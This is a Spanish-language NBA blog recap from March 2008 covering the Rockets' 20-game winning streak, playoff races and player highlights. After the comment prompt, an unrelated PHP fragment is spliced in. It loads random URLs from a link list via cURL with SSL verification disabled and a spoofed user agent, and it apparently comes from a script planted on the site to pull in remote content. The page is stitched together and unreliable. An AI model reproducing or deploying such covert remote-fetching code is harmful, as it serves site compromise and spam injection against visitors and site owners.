La crónica (12/03/08)

13 de March de 2008 por MagicJohnson32

La cabeza del Oeste y la lucha por la última plaza de Playoffs del Este se aprietan aún más. Aunque la noticia vuelve a ser Houston Rockets, que sigue ganando partidos y batiendo récords. Arrancamos con el vídeo de resumen y os dejamos con la crónica de lo sucedido la pasada madrugada.

La crónica:

tmacbattierhug

Y ya son 20. Fue un partido feo pero los Rockets se convirtieron en el tercer equipo en toda la historia que alcanza las veinte victorias consecutivas tras ganar en Atlanta por 83-75. Ambos equipos se quedaron por debajo del 35% de acierto pero Houston terminó imponiendo su gran estado de forma para, con 21 puntos de McGrady en la segunda mitad, situarse 2º del Oeste y en cabeza de la división Southwest con el mismo balance que San Antonio. Y esto sucedió con la ayuda de los Hornets, que pasaron por encima de los Spurs, 75-100, en una exhibición de la pareja Chris Paul-David West. Newcp3duncan Orleans, que de esta forma reduce a medio partido la distancia con respecto a Spurs y Rockets, remató el partido con un 8-24 en el último cuarto. Sólo 2,5 partidos por detrás de Houston siguen los Mavs, que ganaron sin problemas a los Bobcats por 93-118.

Mucho más sufrido fue el triunfo de los Jazz en Milwaukee por 114-110. Los titulares de los Jazz anotaron 98 puntos, mientras que Redd, Villanueva y Bell sumaron 76. La victoria es importante para Utah, ya que también vencieron los Nuggets, que tuvieron un sencillo compromiso ante los Grizzlies. Navarro fue el máximo anotador de su equipo, Iverson se lesionó y Kenyon Martin fue el mejor de un partido sin historia, 86-108. Ganar este partido sólo le valió a Denver para que perder comba, ya que también vencieron los Warriors. La pareja Ellis-Davis sigue haciendo estragos, y anoche la víctima fueron los Raptors, por 106-117. Entre ambos anotaron 24 de 36 lanzamientos, a los que Baron añadió 15 asistencias con una sola pérdida. Calderón sigue perdiendo terreno respecto a TJ Ford y Toronto sigue añorando a Chris Bosh.iguosixers

En el Este, el panorama dio un pequeño giro. Las derrotas de Bucks y Bobcats les impidieron aprovechar la de los Hawks para acercarse a posiciones de Playoffs. No dejaron pasar su oportunidad los Nets, que sorprendieron a Cleveland con una victoria 99-104 que les sirve para situarse en la octava plaza que venía ocupando Atlanta. La exhibición de LeBron, 42-11-7, no compensó las ausencias de Ilgauskas y Wallace. Y los que parecen decididos a disputar los Playoffs son los Sixers, quienes protagonizaron la sorpresa de la jornada al ganar en Detroit 82-83 en lo que parece un anticipo de la primera ronda de las series por el título. Celtics y Magic, los otros dos equipos que ocupan la cabeza del Este, sí ganaron sus partidos ante Sonics (82-111) y Clippers (88-110) respectivamente. Por último, el duelo entre los dos peores equipos del Este, Knicks y Heat, lo ganaron los menos malos (al menos esta temporada) y NY se impuso por 91-88.

MVP: Exhibición reboteadora de Josh Smith, que se ha ido a los 22 rebotes, exhibición anotadora de Lebron James, que ha anotado 42 puntos, y exhibición dirigiendo a su equipo de Chris Paul, con 17 asistencias. Otra exhibición fue la protagonizada por el backcourt titular de los Warriors, Monta Ellis & Baron Davis, 56 puntos, 19 asistencias y 10 rebotes entre ambos ¡Qué grandes!

Rookie: Destacamos a los de siempre: Kevin Durant, 16 puntos; Al Horford, 11 puntos y 9 rebotes; y Al Thornton, 17 puntos. Son los 3 favoritos para el rookie del año, con ventaja para los 2 primeros.

Sorpresa: Hoy hay que destacar las actuaciones inesperadas de Brandon Bass, Chuck Hayes, Bostjan Nachbar, Devin Brown y Rodney Carney. Además, después de un tiempo titubeante, Josh Howard ha vuelto a ser decisivo en los Dallas Mavericks.

Decepción: Lamentable partido de la pareja Mike Conley/Mike Miller, que juntos han anotado 5 de sus 25 lanzamientos para lograr 16 puntos. Mención aparte merece Rafer Alston que ha fallado 15 de sus 18 lanzamientos y sólo ha anotado 8 puntos.

A continuación, veamos las 10 mejores jugadas de la noche:

 

lakers7172

El dato: Los Rockets suman ya 20 victorias seguidas. Si vencen el próximo viernes a los Bobcats, Houston habrá alcanzado la segunda mejor racha de la historia de la NBA, posición que ahora comparte con los Milwaukee Bucks de la temporada 1970-1971, con Oscar Robertson y Kareem Abdul Jabbar (entonces aún Lew Alcindor). Por delante sólo quedarán los Lakers de la 1971-1972, con Jerry West, Wilt Chamberlain y Elgin Baylor, que empezaron aquel año con 33 triunfos consecutivos.

Tanto los Bucks como los Lakers lograron el anillo en dichas temporadas. No se presenta sencillo para los Rockets pero, aunque no ganen el título, el mérito de lo que están consiguiendo no se lo quitará nadie.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>